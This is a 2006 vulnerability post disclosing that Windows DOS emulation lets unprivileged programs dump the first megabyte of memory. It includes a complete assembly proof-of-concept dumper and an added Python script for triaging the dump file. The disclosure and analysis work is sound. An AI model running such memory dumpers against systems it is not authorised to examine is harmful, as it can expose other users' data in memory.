
| Subject: | Windows mem leakage |
|---|---|
| Date: | Tue, 24 Jan 2006 04:01:53 -0800 (PST) |
Desc : Windows DOS emulation allows dumping of the first 1 MB of RAM (with no
particular privilege).
Tested under : Win 2000, XP SP2, 2003
Code :
;---------------- [ dumper.asm ]-----------------------------------------
; Dump first 1 MB of memory under any MS product
; 1 MB is the maximum quantity of accessible memory
; in real mode using 16-bit OSes.
;
; endrazine, last update : 30/12/2005
;
; Build as a .COM file (e.g. tasm dumper.asm ; tlink /t dumper.obj).
;-------------------------------------------------------------------------
code segment
org 100h
assume ds:code, es:code, cs:code
start:
mov ah, 09h              ; print the welcome banner
mov dx, offset welcome
int 21h
xor ax, ax               ; wait until a key is pressed
int 16h
mov ah, 3ch              ; MS-DOS create file; handle is returned in AX
mov dx, offset fname
xor cx, cx               ; normal file attributes
int 21h
mov handle, ax
cld                      ; movsw must walk forward
xor ax, ax               ; start at segment 0000h
mov myds, ax             ; save it while DS still addresses our data
mov ds, ax
mov cx, 32               ; 32 chunks x 32 KB = 1 MB
dabigloop:
push cx
xor si, si               ; source      = myds:0000
mov di, offset buffer    ; destination = cs:buffer
push cs                  ; mov es,cs is not encodable; go through the stack
pop es
mov cx, 16384            ; 16384 words = 32768 bytes
rep movsw
push cs                  ; DS back to our own segment for the write
pop ds
mov ah, 40h              ; MS-DOS write to handle
mov bx, handle
mov cx, 32768
mov dx, offset buffer
int 21h
mov ax, myds
add ax, 2048             ; next 32 KB chunk (2048 paragraphs)
mov myds, ax
mov ds, ax
pop cx
loop dabigloop
mov ah, 3eh              ; close the file
mov bx, handle
int 21h
mov ax, 4c00h            ; quit
int 21h
myds dw ?
handle dw ?
welcome db '[ Raw Dos Memory Dumper ]',13,10
db 13,10
db '[ coded by endrazine ]',13,10
db 13,10
db '[ Dumping First Memory chunk to Dump.txt ]',13,10
db 'Press any key$'
fname db 'Dump.txt',0
buffer db 32768 dup (?)
some_canari_separator db '//////////',0
code ends
end start
;------------------------------------------------------------------------
Endrazine-
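An added triage script for the Dump.txt file the program above writes (example code, not part of the original post): it maps the raw 1 MB file onto the standard real-mode memory layout, reports which regions hold non-zero data and how random they look, and lists printable strings, so a defender can judge what the emulated memory actually exposed. The region boundaries, the 8-byte string threshold and the sample dump are assumptions constructed for the example.

```python
"""Triage a raw 1 MiB real-mode dump of the kind Dump.txt holds (added example)."""
import math
import re
import struct
from collections import Counter

CHUNK = 32768               # the dumper writes 32 chunks of 32 KiB
DUMP_SIZE = 32 * CHUNK      # 1 MiB in total

# Standard IBM PC real-mode memory map (start, end exclusive, name).
REGIONS = [
    (0x00000, 0x00400, "IVT"),
    (0x00400, 0x00500, "BIOS data area"),
    (0x00500, 0xA0000, "conventional memory"),
    (0xA0000, 0xC0000, "video RAM"),
    (0xC0000, 0xF0000, "option ROMs / UMB"),
    (0xF0000, 0x100000, "system BIOS"),
]

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for all-zero padding, 8.0 for uniform bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def triage(dump: bytes) -> dict:
    """Per-region size, non-zero byte count and entropy: shows which regions actually hold data."""
    if len(dump) != DUMP_SIZE:
        raise ValueError(f"expected {DUMP_SIZE} bytes, got {len(dump)}")
    report = {}
    for start, end, name in REGIONS:
        blob = dump[start:end]
        report[name] = {"bytes": len(blob), "nonzero": len(blob) - blob.count(0),
                        "entropy": round(entropy(blob), 2)}
    return report

def find_strings(dump: bytes, min_len: int = 8) -> list:
    """(linear address, text) for every run of at least min_len printable ASCII bytes."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pat.finditer(dump)]

def make_sample_dump() -> bytes:
    """Constructed stand-in for Dump.txt, not a real capture."""
    dump = bytearray(DUMP_SIZE)
    # 256 fake interrupt vectors (F000:0010*i) in the IVT
    dump[0:0x400] = b"".join(struct.pack("<HH", 0x10 * i, 0xF000) for i in range(256))
    banner = b"[ Raw Dos Memory Dumper ]"   # the dumper's own banner where the .COM was loaded
    dump[0x10100:0x10100 + len(banner)] = banner
    dump[0xF0000:0x100000] = bytes(range(256)) * 256   # every byte value equally often
    return bytes(dump)
```

Run `triage(open("Dump.txt", "rb").read())` on a real file; under NTVDM the addresses in the dump are those of the VDM process's emulated real-mode memory, so the triage describes what that emulated space contains.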